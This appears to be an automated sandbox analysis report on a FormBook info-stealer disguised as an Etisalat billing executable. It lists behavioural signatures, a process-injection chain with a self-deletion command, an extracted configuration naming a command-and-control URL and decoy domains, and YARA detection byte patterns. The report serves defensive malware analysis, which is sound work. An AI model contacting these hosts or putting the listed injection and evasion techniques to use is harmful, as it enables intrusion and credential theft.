Edit tour

Windows Analysis Report
Etisalat Summary Bill for the Month of August.exe

Overview

General Information

Sample name:	Etisalat Summary Bill for the Month of August.exe
Analysis ID:	1501709
MD5:	df6915639adaa48dad6b5cad220f1b73
SHA1:	b7780024fb645196808de54fcb3d48a5581c026d
SHA256:	a73dc341737a15724833932b844ce4444908158b2b6056386798e440235364db
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Found API chain indicative of sandbox detection

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Etisalat Summary Bill for the Month of August.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe" MD5: DF6915639ADAA48DAD6B5CAD220F1B73)

svchost.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\Etisalat Summary Bill for the Month of August.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

chkdsk.exe (PID: 3128 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

cmd.exe (PID: 5548 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.wheresthechocolateat.com/pt46/"], "decoy": ["twinportslocal.com", "rovor.store", "98169.club", "mdywl.com", "jrd3s.rest", "aston1717.top", "floridawoodworkingmachinery.com", "17tk555t.com", "ankitsho.shop", "seclameh.com", "realrecordlabel.com", "trenchonbirmingham.com", "af28.top", "rtp1kenzototo.com", "theselflovesite.com", "promotegetpaid.info", "strategiclogisticsagency.com", "learneracademy.net", "per-watch.com", "betbox2341.com", "22958.xyz", "birthdaywishestexts.com", "nihilculturamail.com", "vasymaman.com", "evriukpostaes.sbs", "winkingbots.com", "cb214.pro", "osakanacreation.com", "kingchuxing.com", "dr-cotton.net", "iiixc759q.xyz", "eraplay88rtpgacor.lat", "wguujb.com", "dental-implants-89083.bond", "liposuction-89237.bond", "harbalmaizik.com", "seoservicesdelhi.net", "fakefox.xyz", "wimetimephotos.com", "healthsaveplus.com", "wvufcw948o.top", "dieselrockpartners.com", "istchannelnet.com", "123moviesonl.com", "arlatwestern.shop", "cloudproduction.cloud", "gv3l1.vip", "casino-x-zerkalo27pm.xyz", "serverdayz.com", "dvdripguides.com", "vitalfitness.site", "c21candacedevillier.com", "gory12.online", "0452frl.com", "escpethemtrix.top", "koumimi.tech", "me29hs38g1.com", "dreziuy.xyz", "uddyen.shop", "asia76s.xyz", "melliccine.com", "olxelang.com", "paincareathome.com", "sliveringaf.christmas"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.2082860497.0000000003D50000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4486741403.0000000005520000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.2082424231.00000000031D0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4486811482.0000000005570000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.2082242676.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.4486403217.00000000050B0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.2025613057.0000000003810000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Etisalat Summary Bill for the Month of August.exe PID: 6544	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x19f3ab:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 5020	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x516c:$a1: 3C 30 50 4F 53 54 74 09 40 0xc8e79:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: chkdsk.exe PID: 3128	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x77ce:$a1: 3C 30 50 4F 53 54 74 09 40 0x10b2b5:$a1: 3C 30 50 4F 53 54 74 09 40 0x1494d4:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Etisalat Summary Bill for the Month of August.exe.3810000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
